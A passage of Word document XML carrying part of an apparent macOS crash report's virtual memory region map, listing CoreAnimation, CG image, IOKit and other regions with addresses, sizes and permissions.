        <w:t xml:space="preserve">CoreAnimation          000000010f9eb000-000000010f9f3000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010f9f4000-000000010f9f6000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010f9f6000-000000010f9fe000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fa00000-000000010fa04000 [   16K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fa06000-000000010fa12000 [   48K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fa12000-000000010fa14000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fa14000-000000010fa1c000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fa1e000-000000010fa20000 [    8K] rw-/rwx SM=ZER  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fa20000-000000010fa24000 [   16K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fa24000-000000010fa25000 [    4K] rw-/rwx SM=ZER  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fa25000-000000010fa27000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fa2c000-000000010fa30000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CG image               000000010fa30000-000000010fa32000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fa32000-000000010fa3e000 [   48K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fa3e000-000000010fa44000 [   24K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fa44000-000000010fa4c000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fa50000-000000010fa54000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fa54000-000000010fa58000 [   16K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fa59000-000000010fa61000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fa61000-000000010fa63000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fa63000-000000010fa6b000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fa6c000-000000010fa6e000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fa6e000-000000010fa7e000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Swift metadata         000000010fa7e000-000000010fa7f000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fa80000-000000010fa81000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fa81000-000000010fa89000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fa89000-000000010fa8d000 [   16K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CG image               000000010fa94000-000000010fa96000 [    8K] rw-/rwx SM=ZER  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fa96000-000000010fa99000 [   12K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fa9b000-000000010fa9c000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fa9e000-000000010faa6000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010faa7000-000000010fabf000 [   96K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">VM_ALLOCATE            000000010fac0000-000000010fac1000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fac2000-000000010fac6000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fac6000-000000010faca000 [   16K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Swift metadata         000000010faca000-000000010facc000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010facc000-000000010fad0000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">VM_ALLOCATE            000000010fad0000-000000010fad1000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fad1000-000000010fad2000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fad2000-000000010faf7000 [  148K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fafc000-000000010fb10000 [   80K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fb17000-000000010fb1b000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">VM_ALLOCATE            000000010fb22000-000000010fb24000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Memory Tag 251         000000010fb24000-000000010fb27000 [   12K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fb27000-000000010fb28000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fb28000-000000010fb34000 [   48K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fb34000-000000010fb37000 [   12K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fb3f000-000000010fb45000 [   24K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fb45000-000000010fb47000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image file      000000010fb47000-000000010fb49000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fb49000-000000010fb4d000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fb4d000-000000010fb4f000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  000000010fb4f000-000000010fb50000 [    4K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fb50000-000000010fb58000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fb5c000-000000010fb5e000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  000000010fb5e000-000000010fb5f000 [    4K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fb5f000-000000010fb61000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreAnimation          000000010fb63000-000000010fb77000 [   80K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fb82000-000000010fb85000 [   12K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fb8d000-000000010fb8f000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fb90000-000000010fb98000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fba6000-000000010fbb6000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fbb6000-000000010fbb9000 [   12K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fbb9000-000000010fbc1000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fbc5000-000000010fbc6000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fbcb000-000000010fbd3000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fbd6000-000000010fbd9000 [   12K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Image IO               000000010fbdb000-000000010fbdc000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fbdc000-000000010fbe4000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fbe8000-000000010fbf4000 [   48K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fbf4000-000000010fbf5000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fbf8000-000000010fbfb000 [   12K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreAnimation          000000010fbfb000-000000010fbff000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fc0b000-000000010fc0c000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fc0c000-000000010fc10000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fc10000-000000010fc11000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fc11000-000000010fc15000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">VM_ALLOCATE            000000010fc15000-000000010fc17000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fc17000-000000010fc27000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fc27000-000000010fc29000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Image IO               000000010fc2b000-000000010fc2e000 [   12K] rw-/rwx SM=COW  x-alloc_0x7fbdb1060000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fc2e000-000000010fc31000 [   12K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fc31000-000000010fc3f000 [   56K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fc3f000-000000010fc41000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Image IO               000000010fc41000-000000010fc51000 [   64K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fc52000-000000010fc6a000 [   96K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fc6e000-000000010fc82000 [   80K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">IOKit                  000000010fc84000-000000010fc86000 [    8K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fc86000-000000010fc87000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">OpenCL                 000000010fc8e000-000000010fc90000 [    8K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">OpenCL                 000000010fc90000-000000010fc92000 [    8K] rw-/rwx SM=ZER  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fc9b000-000000010fca3000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fca5000-000000010fca7000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fca7000-000000010fcc3000 [  112K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010fcc5000-000000010fcc9000 [   16K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fcc9000-000000010fccd000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fcd1000-000000010fce9000 [   96K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fced000-000000010fcfd000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fd06000-000000010fd0e000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fd12000-000000010fd16000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Memory Tag 251         000000010fd16000-000000010fd19000 [   12K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fd19000-000000010fd21000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CG image               000000010fd23000-000000010fd25000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fd25000-000000010fd4d000 [  160K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fd61000-000000010fd69000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fd6a000-000000010fd86000 [  112K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fd89000-000000010fda5000 [  112K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fda9000-000000010fdad000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fdaf000-000000010fdb7000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fdc1000-000000010fdd1000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fdd5000-000000010fddd000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fde1000-000000010fdf9000 [   96K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fdfb000-000000010fe1b000 [  128K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fe25000-000000010fe29000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fe2b000-000000010fe69000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fe7c000-000000010fe8c000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
